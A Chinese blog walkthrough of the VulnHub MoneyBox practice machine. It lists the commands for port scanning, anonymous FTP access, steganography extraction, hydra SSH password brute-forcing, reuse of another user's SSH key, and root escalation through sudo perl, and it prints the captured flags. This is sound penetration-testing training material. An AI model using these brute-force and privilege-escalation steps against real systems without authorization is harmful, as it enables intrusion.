MONEYBOX靶场(打靶流程)

已于 2023-10-27 22:01:33 修改
阅读量339 收藏 1
点赞数
文章标签: 网络 安全 网络安全
于 2023-10-27 21:55:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53733257/article/details/134084111
版权

一、靶场搭建

靶机下载:http://www.vulnhub.com/entry/moneybox-1,653/#download

靶机IP:192.168.21.26

攻击机:kali、windows10

注意:靶机密码直接在开机界面e键修改,具体方法自己上网找,进入后dhclient命令获取IP。

二、靶机目标

找到靶机内的三个flag值。

三、使用工具

端口扫描工具:nmap、fscan

目录扫描工具:dirsearch

暴力破解工具:hydra

图片解隐写工具:steghide

四、详细步骤

1.信息收集

1.1 端口扫描

已知信息只有IP地址——192.168.21.60,因此首先对该IP进行全端口扫描。

使用工具:nmap。

nmap -sS 192.168.21.26 -p 0-65535

扫描结果如下图:发现存在21(ftp)、22(ssh)、80(http)端口。

为了避免漏扫,这里使用了另一个工具再次对该ip进行全端口扫描。

使用工具:fscan。

fscan64.exe -h 192.168.21.26 -p 0-65535

扫描结果如下图:发现额外的25(SMTP)、110(POP3)端口,这两个端口用于邮件的发送、接收、下载;还发现ftp存在匿名用户登录。

1.2 探索21(ftp)端口

用匿名帐户登录ftp,密码为空。

ftp anonymous@192.168.21.26

查看当前所在目录以及目录下文件,这里做过其他尝试,想要切换到其他目录等发现permission denied(操作权限不够),因此这里只得到一个图片——trytofind.jpg。

pwd #查看当前所在目录

ls #查看当前目录下文件

下载该图片,该图片看似只是普通图片,信息不够继续收集。

get trytofind.jpg

1.3 探索80(http)端口

访问http://192.168.21.26,页面如下:

打开控制台查看页面源代码,一无所获,该网页上没有任何功能点。

1.4 敏感目录扫描

该页面上没有发现,就尝试扩大攻击面,扫描网站敏感目录。

使用工具:御剑。

扫描结果如下:

发现新的网页界面——http://192.168.21.26/blogs/

访问http://192.168.21.26/blogs/,根据页面提示,在该页面F12查看器下发现存在另一个目录S3cr3t-T3xt。

访问该目录http://192.168.21.26/S3cr3t-T3xt,在该页面查看器下发现一个密码3xtr4ctd4t4,暂时不知道用在哪里。

1.5 探索22(ssh)端口

尝试暴力破解root密码,未成功,很有可能root用户被禁止远程登录,或者密码为强密码。

使用工具:hydra。

hydra -l root -P a.txt -t 4 ssh://192.168.21.26
#-l 指定用户
#-P 注意是大写P,指定字典
#-t 指定线程

2.分析信息,漏洞验证

端口探索完毕,25和110端口用于邮件收发,不做进一步探测。

整合目前信息:得到一张图片——trytofind.jpg,以及未知用处的密码——3xtr4ctd4t4,根据文件名合理猜测该图片可能被隐写,而密码用于解隐写。

2.1 图片解隐写

使用工具:steghide。

steghide extract -sf trytofind.jpg

结果如下:得到一个文件data.txt。

查看文件内容:

cat data.txt

结果显示存在用户renu且密码是弱密码。

2.2 暴力破解

暴力破解renu的密码。

使用工具:hydra。

hydra -l renu -P a.txt -t 4 ssh://192.168.21.26

结果如下:renu用户密码是987654321。

3.远程登录ssh

3.1 第一个flag
ssh renu@192.168.21.26 

立马查看当前所在路径和当前目录文件,找到第一个flag值。

us3r1{F14g:0ku74tbd3777y4}

查看renu用户历史命令

History

结果如下:发现另一个用户lily以及登录方法。

3.2 第二个flag

登录lily用户。

cd .ssh

ssh -i id_rsa lily@192.168.21.26

查看用户当前路径和文件,得到第二个flag值:

us3r{F14g:tr5827r5wu6nklao}

查看lily用户历史命令。

history

结果如下:发现root用户编辑过sudoers文件。

列出当前用户可执行的和不可执行的命令。

sudo -l

结果如下:发现lily用户可以root权限执行/usr/bin/perl命令。

4.perl提权

第三个flag

输入以下命令提权:

sudo perl -e 'exec "/bin/bash";'

已提升为root权限。

查看root目录和目录下文件,无果。

查看历史命令,发现.root.txt文件。

使用find命令查找该文件位置。

find / -type f -name '.root.txt'

结果如下,文件在/root目录下。

得到第三个flag值:

cat /root/.root.txt

r00t{H4ckth3p14n3t}

sheepyeah
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
日常笔记~moneybox渗透测试
m0_74037751的博客
10-19 135
这里可以看到目标电脑开启了ftp,ssh,http服务,可以先使用kali自带的漏洞扫描对目标机器进行侦测 sudo nmap -p[端口] -sV -sC IP。按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限。这里使用了strings工具查看可打印字符,这里发现有很多个(属于不正常现象,接下来使用steghide进行更深层的渗透,结果需要密码,就暂且搁置。尝试切换目录,可惜还是无法进入root目录。
MoneyBox靶场实战
m0_72212352的博客
10-30 205
19.对比renu目录下公钥文件ia_rsa.pub和lily目录下公钥文件authorized_keys,发现其内容相同,尝试是否可以用renu的私钥登录lily。17.查看renu目录下所有文件目录,存在.ssh目录,进入该目录查看存在公钥id_rsa.pub和私钥id_rsa。18.查看lily目录下所有文件目录,发现lily目录下也存在公钥文件authorized_keys。7.显示图片的相关信息,其中有data.txt文件,密码为步骤5中的3xtr4ctd4t4。
3k字小白通关Moneybox渗透,作业级wp!(bushi
最新发布
李仁间想念月圆的博客
04-29 1094
这是一个web小白打的第一个像模像样的靶机,趁着还有激情,写了第一篇像这样一个较为精细的wp博客。虽然从头写wp时也有了新发现、新思路,但也许也在一些方面存在解释不准确、方法不简便等问题,还请各位同学大佬评论区指正。日后也希望自己能够坚持下去。不知道那个家伙会不会来看——
MoneyBox靶场练习
2301_78494717的博客
10-31 34
1)使用history命令,查看renu用户历史操作,发现renu用户复制了lily用户的ssh私钥。2)查看、提取隐写信息,提取密码为web页面获取的3xtr4ctd4t4。2)使用hydra爆破,发现renu登录密码:987654321。1)Kali扫描靶机端口,发现靶机开放21、22、80端口。3)使用nmap默认脚本测试,发现ftp可以匿名登录。根据内容可知,有一个renu用户,且存在弱口令。1)查看图片字符串信息,发现头部有明显异常。3)使用renu用户SSH登录靶机。2)查看靶机开放服务。
记一次MoneyBox靶场练习
m0_70272734的博客
10-30 219
使用的是kali里的nmap工具,扫描全端口,IP为靶机IP(下面的IP跟第一点里获得的IP不一样仅仅是因为第一点的图是我后来补上的,都是靶机的IP)12、输入root,和自己设置的密码,登录,查看IP,同样没有,我们再次输入dhclient,回车,再次查看IP。打开kali的ssh服务,再次破解。10、ip a查看IP地址,这里是没有IP的,输入dhclient,回车,再次查看IP。#-p 密码参数,后面空格跟密码,无密码可不加参数,回车就好。登录,不稳定哈,22端口,一会儿可以,一会儿不行的。
MoneyBox 靶场复现
hcufo的博客
07-20 131
web app 部署站点,通常有前台,应该还有后台,通过后台登录管理,爆破网站所有路径出来,再登录,尝试通过后台页面登录。通过在内网进一步渗透,掌握内网拓扑结构和权限,评估内部安全风险,指导您优化内部安全策略。打开是index.html页面,查看源码,正常 ,没有写的不严谨的地方。通过观察图片,图片上没有新提示,从直观上感觉图片正常,没有问题。Secret key?根据之前探测出系统开放22端口,ssh服务,用户renu,密码弱。我无法登录靶场,又出现无法继续渗透场景……
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
Moneybox
10-28
"Moneybox"是一个与字体相关的主题,这通常指的是一个包含多种字体资源的压缩包文件。在设计、排版和出版领域,字体的选择对于传达信息和创造视觉效果至关重要。以下是一些关于字体及其应用的重要知识点: 1. **...
moneybox:钱箱应用
05-23
Moneybox OTP应用程序项目结构检索项目后 $ ./mad deps您将在树中找到以下关键应用: ├── apps/moneybox -- N2O based application快速启动引导 ./mad deps compile plan repl生产开始通常,我们使用make console...
vue实现简单实时汇率计算功能
08-31
每个`moneyBox`包含一个span元素和一个input元素,input元素使用`v-model`指令与Vue实例中的数据模型进行双向绑定,这样当用户输入时,数据模型会自动更新,反之亦然。 ```html 汇率转换 <div class="moneyBox">...
【新手向】VulnHub靶场MONEYBOX 1 详细解析,网络安全面试总结
m0_61331237的博客
04-06 1032
经过访问和验证后,确认目标靶场为192.168.3.27。探测到三个开放的端口,对端口做进一步的探测。使用nmap对192.168.3.27做更详细的探测,发现(自上而下):1、21端口ftp服务允许匿名登录,还有一张trytofind.jpg图片;2、22端口ssh服务有一些key;3、80端口http服务存在一个网页Title:MoneyBox。参数含义:-A:Aggressive(激进)扫描模式。这是一个组合选项,包含了以下功能:-sS(TCP SYN 扫描)
【新手向】VulnHub靶场MONEYBOX 1 详细解析,通过五轮面试斩获offer阿里实习生亲述
2401_83739503的博客
04-14 531
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
MoneyBox靶场复现与实战
m0_65150886的博客
10-13 76
靶场下载:http://www.vulnhub.com/entry/moneybox-1,653/#download靶场导入管理->导入虚拟电脑选择下载的ova文件网络设置为桥接模式,并启动环境。
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 1693
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
MoneyBox: 1靶机
zzf011900的博客
02-05 254
查看一下history历史命令,ip地址还跟本地有一个同样叫lily的账号,那就是把生成的密钥发送给了本地的lily账户,如果是这样的话就能不用账号密码,用密钥就能够登录lily账户,为了验证这个猜想,执行ssh lily@192.168.10.131。ftp 192.168.10.131 输入账号anonymous,密码为空或者anonymous1234也可以,连接上ftp后ls一下,看看有什么内容。爆破到了ftp的账号密码,这是ftp的允许匿名登陆,密码为空也是可以的。目录爆破发现blogs目录。
Vnulnhub靶场 MONEYBOX:1
cawwwww的博客
12-19 402
扫描结果可以看得到大部分页面的响应码都是403,即禁止访问,而那个200就是刚才我们探测的主页面,并没有什么信息,但是这里还有一个blogs文件,反应码是301,跟其他的不一样,我们也尝试访问一下。成功登录了对方的ftp服务,我们ls查看一下有什么东西,可以看到有个名为trytofind.jpg的图片,我们使用下面这个命令把他下载到根目录。
MoneyBox 靶机笔记
MZa1213123的博客
03-05 4660
一、搜集信息 1、搭建好 MoneyBox 的靶机后,由于是桥接网络,用 nmap 扫描网段 nmap 10.77.192.0/24 发现目标为 10.77.192.219 继续搜集信息 nmap -sV -A 10.77.192.219 发现可以匿名 ftp 登录和开放了 80 端口还有 ssh 进网站看看有什么线索 记得看看源码(ctrl + u) 没发现什么有用的 gobuster 扫描一下网站的目录 发现 blogs 路径 继续查看该路径以及其源码
Vulnhub_MoneyBox
qq_45434762的博客
03-11 949
主机信息Kali:192.168.1.5 MoneyBox:192.168.1.11 通过nmap扫描获得了主机IP为192.168.1.11,并开放了21、22、80端口nmap 192...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值